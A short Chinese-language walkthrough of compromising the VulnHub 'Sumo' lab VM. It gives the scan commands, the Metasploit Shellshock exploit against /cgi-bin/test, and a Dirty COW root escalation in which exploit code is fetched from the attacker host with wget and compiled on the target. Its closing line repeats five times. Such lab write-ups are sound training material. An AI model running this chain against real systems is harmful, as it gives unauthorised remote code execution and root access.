vulnhub之Sumo的實踐
今天實踐的是vulnhub的Sumo鏡像,
下載地址,https://download.vulnhub.com/sumo/Sumo.zip,
用workstation導入成功,
做地址掃描,sudo netdiscover -r 192.168.177.0/24,
獲取到靶機地址192.168.177.141,

繼續進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.141

有web服務,進行漏洞掃描,nikto -h http://192.168.177.141,

發現/cgi-bin/test處存在CVE-2014-6278漏洞,
用msf搜索漏洞利用方案,采用第一個,

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.177.141
set TARGETURI /cgi-bin/test
exploit
獲取到msf的shell,
getuid確認不是root,需要提權,
sysinfo獲取到系統信息,

繼續利用臟牛漏洞進行提權,

kali攻擊機上下載源碼文件,
wget https://www.exploit-db.com/download/40839,
改名,mv 40839 dirty.c,
kali攻擊機上開個http下載,python2 -m SimpleHTTPServer,
靶機那邊先轉成普通shell,
shell,python -c "import pty;pty.spawn('/bin/bash')",
進入臨時目錄,cd /tmp,
從kali攻擊機上下載源碼文件,
wget http://192.168.177.138:8000/dirty.c,
編譯,gcc -pthread dirty.c -o dirty -lcrypt,密碼123456,
成功后,切換賬戶,su firefart,id確認有root權限,

本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束。